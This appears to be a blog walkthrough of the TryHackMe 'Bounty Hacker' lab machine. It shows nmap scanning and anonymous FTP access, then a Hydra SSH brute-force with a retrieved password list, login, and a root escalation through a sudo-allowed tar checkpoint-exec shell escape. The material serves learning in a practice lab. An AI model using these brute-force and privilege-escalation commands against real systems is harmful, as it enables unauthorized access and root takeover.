1.Introduction
Welcome back guys, Today we will take a new room from tryhackme called Bounty-Hunter This is a linux machine machine which is simply beginner friendly for beginners. This room only contains 1 TASK with 7 questions.
Our objective is to find the user password and capture all the flags one machine
2. Enumeration
As always Enumeration is our main key. So Lets Scan this with our NMAP
sudo nmap -sC -sV -T4 10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter] └╼ [★]$ sudo nmap -sC -sV -T4 -oA initial.nmap 10.10.205.103 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 23:27 IST Nmap scan report for 10.10.205.103 Host is up (0.35s latency). Not shown: 967 filtered ports, 30 closed ports PORT STATE SERVICE VERSION 21 /tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt |_-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.70.156 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22 /tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80 /tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn t have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHere 3 ports are open.
21 : FTP
22 : SSH
80 : HTTP
From nmap result we can identify that this server allows annonymous FTP login So let check the FTP server of this machine.
ftp 10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ ftp 10.10.205.103
Connected to 10.10.205.103.
220 (vsFTPd 3.0.3)
Name (10.10.205.103
Yeah ! we logged to the FTP sucessfully.on the ftp server we can see that there are Two files are present -task.txt , -locks.txt
From this the task.txt gives us the answer for the #3 Question of our task and it’s a Username on that machine.
Lin
The second one -locks.txt is an password list which will help to bruteforce it.
3.Bruteforce
From Nmap we see another service is running on port 22 of this machine which is SSH
so lets bruteforce this service with our password list lock.txt for the username Lin using hydra.
hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter] └──╼ [★]$hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations,or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-14 00:18:59 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 15 tasks per 1 server, overall 15 tasks, 26 login tries (l:1/p:26), ~2 tries per task [DATA] attacking ssh://10.10.205.103:22/ [22][ssh] host: 10.10.205.103 login: lin password: R****************3 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-14 00:19:08
[DATA] attacking ssh://10.10.205.103:22/
[22][ssh] host: 10.10.205.103 login: lin password: R****************3Hydra did its work perfectly it gives us the password for the ssh of this machine.
so we got the answer for our #5 question of the task.
so lets jump for ssh connection to this machine.
4.SSH Connection
So we go the username and password now lets login
ssh lin@10.10.205.103─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ ssh lin@10.10.205.103
The authenticity of host ‘10.10.205.103 (10.10.205.103)’ can’t be established.
ECDSA key fingerprint is SHA256
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
83 packages can be updated. 0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14 lin@bountyhacker:~/Desktop$ whoami lin
so we got access to the machine.now lets check for our flags.first we will check of our userflag
ls -llin@bountyhacker:~/Desktop cat user.txt THM{C**_*******}
USER FLAG
**THM{C**_*******}
Now the Question #6 is completed
5. Privilage Escalation
so we got our user flag of this machine. now lets check for how to get our root flag of this machine.
First Lets check what commands run as sudo for our user Lin on this machine
it can be checked with the command
sudo -llin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin: /usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User lin may run the following commands on bountyhacker: (root) /bin/tar
Our user lin can run tar with root permission
without wasteing our time lets quick jump to GTFOBins which contains things that can used for escalation
Lets search for tar
from GTFOBins we get that tar can also be used for escalation.
sudo tar -cf /dev/null /dev/null —checkpoint=1 —checkpoint-action=exec=/bin/sh
lin@bountyhacker:~/Desktop sudo tar -cf /dev/null /dev/null —checkpoint=1
—checkpoint-action=exec=/bin/sh
tar: Removing leading / from member names
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
Now we obtained the root access. Now Let check our root flag for what inside it
cat /root/root.txt# cat /root/root.txtTHM{8*****_******}Root Flag
THM{8_***}
Our Last Question #7 for this task is now Completed.
6 .Conclusion
Yeah The Machine was realy cool and helpfull for learning..
Thanks .